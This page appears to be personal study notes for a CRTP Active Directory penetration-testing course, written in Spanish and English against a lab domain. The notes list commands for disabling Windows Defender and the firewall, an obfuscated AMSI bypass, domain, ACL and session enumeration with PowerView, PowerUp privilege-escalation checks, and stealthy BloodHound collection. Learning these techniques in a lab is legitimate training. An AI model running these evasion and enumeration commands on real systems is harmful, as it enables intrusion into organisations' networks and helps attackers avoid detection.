Comandos

RunAs

runas /user:chichocorp.local\mrdesdes powershell.exe

Execution Policy

powershell -ep bypass

Desactivar Windows Defender

Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true

Desactivar Firewall

netsh advfirewall set allprofiles state off

AppLocker

PS C:\> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
[dcorp-adminsrv]: PS C:\> Get-AppLockerPolicy -Effective

Version RuleCollections RuleCollectionTypes
------- --------------- -------------------
      1 {0, 0, 0, 0...} {Appx, Dll, Exe, Msi...}

PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections


PublisherConditions : {*\O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*,*}
PublisherExceptions : {}
PathExceptions      : {}
HashExceptions      : {}
Id                  : 38a711c4-c0b8-46ee-98cf-c9636366548e
Name                : Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Description         :
UserOrGroupSid      : S-1-1-0
Action              : Allow

PublisherConditions : {*\O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*,*}
PublisherExceptions : {}
PathExceptions      : {}
HashExceptions      : {}
Id                  : 8a64fa2c-8c17-415a-8505-44fc7d7810ad
Name                : Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Description         :
UserOrGroupSid      : S-1-1-0
Action              : Allow

PathConditions      : {%PROGRAMFILES%\*}
PathExceptions      : {}
PublisherExceptions : {}
HashExceptions      : {}
Id                  : 06dce67b-934c-454f-a263-2515c8796a5d
Name                : (Default Rule) All scripts located in the Program Files folder
Description         : Allows members of the Everyone group to run scripts that are located in the Program Files folder.
UserOrGroupSid      : S-1-1-0
Action              : Allow

PathConditions      : {%WINDIR%\*}
PathExceptions      : {}
PublisherExceptions : {}
HashExceptions      : {}
Id                  : 9428c672-5fc3-47f4-808a-a0011f36dd2c
Name                : (Default Rule) All scripts located in the Windows folder
Description         : Allows members of the Everyone group to run scripts that are located in the Windows folder.
UserOrGroupSid      : S-1-1-0
Action              : Allow

Amsi Bypass

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Importar RSAT

PS C:\AD\Tools\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools\ADModule-master> cd .\ActiveDirectory\
PS C:\AD\Tools\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1

Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator

Enumeracion del Dominio

# Obteniendo la informacion del dominio
Get-DomainComputer -Domain chichocorp.local

# Obteniendo Trusts
Get-DomainTrust
Get-DomainTrust -Domain chichocorp.local

Get-ADTrust
Get-ADTrust -Identity chichocorp.local

# Obteniendo Forest
Get-Forest
Get-Forest -Forest chichocorp.local

# Obteniendo all global catalogs del forest
Get-ForestGlobalCatalog
Get-ForestGlobalCatalog -Forest chichocorp.local

# Map trusts of a forest
Get-ForestTrust
Get-ForestTrust -Forest chichocorp.local

# Get Forest Domain
Get-ForestDomain
Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
Get-ForestDomain -Forest chichocorp.local | %{Get-DomainTrust -Domain $_.Name}

# Get domain policy for the current domain
(Get-DomainPolicyData).systemaccess
(Get-DomainPolicyData -Domain chichocorp.local).systemaccess

# Get domain controllers for the current domain
Get-DomainController -Domain chichocorp.local

# Get a list of users in the current domain
Get-DomainUser
Get-DomainUser -Identity mrdesdes

# Get list of all properties for users in the current domain
Get-DomainUser -Identity mrdesdes -Properties *
Get-DomainUser -Properties samaccountname,logonCount

# Search for a particular string in a user's attributes:
Get-DomainUser -LDAPFilter "Description=*password*" | Select name,Description

# Get a list of computers in the current domain
Get-DomainComputer | select Name
Get-DomainComputer -OperatingSystem "*Server*"
Get-DomainComputer -OperatingSystem "*Server*" | select name,operatingsystem
Get-DomainComputer -ping
Get-DomainComputer -ping | select Name

# Get all the groups in the current domain
Get-DomainGroup | select Name
Get-DomainGroup -Domain chichocorp.local

# Get all groups containing the word "admin" in group name
Get-DomainGroup *admin*
Get-DomainGroup *admin* | select Name

# Get all the members of the Domain Admins group
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainGroupMember -Identity "Domain Admins" -Recurse | select MemberName

# Get the group membership for a user
Get-DomainGroup -UserName "mrdesdes"

# List all the local groups on a machine (needs administrator privs on non-dc
machines)
Get-NetLocalGroup -ComputerName desktop-828ljno

# Get members of the local group "Administrators" on a machine (needs administrator privs on non-dc machines)
Get-NetLocalGroupMember -ComputerName desktop-828ljno -GroupName Administrators

# Get actively logged users on a computer (needs local admin rights on
the target)
Get-NetLoggedon -ComputerName desktop-828ljno
Get-NetLoggedon -ComputerName desktop-828ljno | select UserName

# Get locally logged users on a computer (needs remote registry on the target - started by-default on server OS)
Get-LoggedonLocal -ComputerName desktop-828ljno

# Get the last logged user on a computer (needs administrative rights and remote registry on the target)
Get-LastLoggedOn -ComputerName desktop-828ljno

# Find shares on hosts in current domain
Invoke-ShareFinder -Verbose

# Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose

# Get all fileservers of the domain
Get-NetFileServer

GPOs

# Get list of GPO in current domain
Get-DomainGPO
Get-DomainGPO -ComputerIdentity desktop-828ljno

# Get GPO(s) which use Restricted Groups or groups.xml for interesting users
Get-DomainGPOLocalGroup

# Get users which are in a local group of a machine using GPO
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity desktop-828ljno

# Get machines where the given user is member of a specific group
Get-DomainGPOUserLocalGroupMapping -Identity mrdesdes -Verbose

# Get OUs in a domain
Get-DomainOU

# Get GPO applied on an OU. Read GPOname from gplink attribute from Get-NetOU
Get-DomainGPO -Identity "{6AC1786C-016F-11D2-945F-00C04fB984F9}"

ACLs

# Get the ACLs associated with the specified object

Get-DomainObjectAcl -SamAccountName mrdesdes -ResolveGUIDs

# Get the ACLs associated with the specified prefix to be used for search
Get-DomainObjectAcl -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=chichocorp,DC=local" -ResolveGUIDs -Verbose

# We can also enumerate ACLs using ActiveDirectory module but without resolving GUIDs
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=chichocorp,DC=local').Access //No me funciona xd

# Search for interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs

# Get the ACLs associated with the specified path
Get-PathAcl -Path "\\chichocorp.local\sysvol"
Get-PathAcl -Path "\\desktop-828ljno.chichocorp.local\c$"

Trusts

# Get a list of all domain trusts for the current domain
Get-DomainTrust
Get-DomainTrust -Domain chichocorp.local

# Get all domains in the current forest
Get-ForestDomain
Get-ForestDomain -Forest chichocorp.local
(Get-ADForest).Domains

# Get all global catalogs for the current forest
Get-ForestGlobalCatalog
Get-ForestGlobalCatalog -Forest chichocorp.local

# Map trusts of a forest (no Forest trusts in the lab)
Get-ForestTrust
Get-ForestTrust -Forest chichocorp.local

User Hunting

# Find all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose //This function queries the DC of the current or provided domain for a list of computers (GetNetComputer) and then use multi-threaded Invoke-CheckLocalAdminAccess on each machine.

# Find computers where a domain admin (or specified user/group) has sessions
Find-DomainUserLocation -Verbose
Find-DomainUserLocation -UserGroupIdentity "RDPUsers"

# Find computers where a domain admin session is available and current user has admin access (uses Test-AdminAccess)
Find-DomainUserLocation -CheckAccess

# Find computers (File Servers and Distributed File servers) where a domain admin session is available.
Find-DomainUserLocation -Stealth

# List sessions on remote machines (https://github.com/Leo4j/InvokeSessionHunter)
Invoke-SessionHunter -FailSafe
Invoke-SessionHunter -NoPortScan -Targets C:\AD\Tools\servers.txt

Privilege Escalation - Local

# Get services with unquoted paths and a space in their name
Get-UnquotedService -Verbose

# Get services where the current user can write to its binary path or change arguments to the binary
Get-ModifiableServiceFile -Verbose

# Get the services whose configuration current user can modify.

Get-ModifiableService -Verbose

# Run all checks from PowerUp
Invoke-AllChecks

Feature Abuse

Jenkins - lab

BloodHound

Proporciona una interfaz gráfica de usuario para las entidades y relaciones AD de los datos recogidos por sus ingestores.
Utiliza la Teoría de Grafos para proporcionar la capacidad de mapear el camino más corto para cosas interesantes como los administradores de dominio.
Hay consultas incorporadas para acciones de uso frecuente.
También admite consultas Cypher personalizadas.

# Import SharpHound
. .\SharpHound.ps1

# Run all methods
Invoke-BloodHound -CollectionMethod All
SharpHound.exe

# To make BloodHound collection stealthy
Invoke-BloodHound –Steatlh
SharpHound.exe –-steatlh

# To avoid detections like MDI

Invoke-BloodHound -ExcludeDCs

Install BloodHound (Parrot)

https://bloodhound.readthedocs.io/en/latest/installation/linux.htmlbloodhound.readthedocs.io

PERO: Realizar un cambio en la instalacion, en el siguiente comando:

echo 'deb https://debian.neo4j.com stable 4' | sudo tee /etc/apt/sources.list.d/neo4j.list > /dev/null

Por:

echo 'deb https://debian.neo4j.com stable latest' | sudo tee /etc/apt/sources.list.d/neo4j.list > /dev/null

Luego de importar el .zip en el BloodHound deberia terminar asi:

PreviousCRTP Notes NextLabs

Last updated 1 year ago

RunAs

Execution Policy

Desactivar Windows Defender

Desactivar Firewall

AppLocker

Amsi Bypass

Importar RSAT

Login a PC

Enumeracion del Dominio

GPOs

ACLs

Trusts

User Hunting

Privilege Escalation - Local

Feature Abuse

BloodHound

Install BloodHound (Parrot)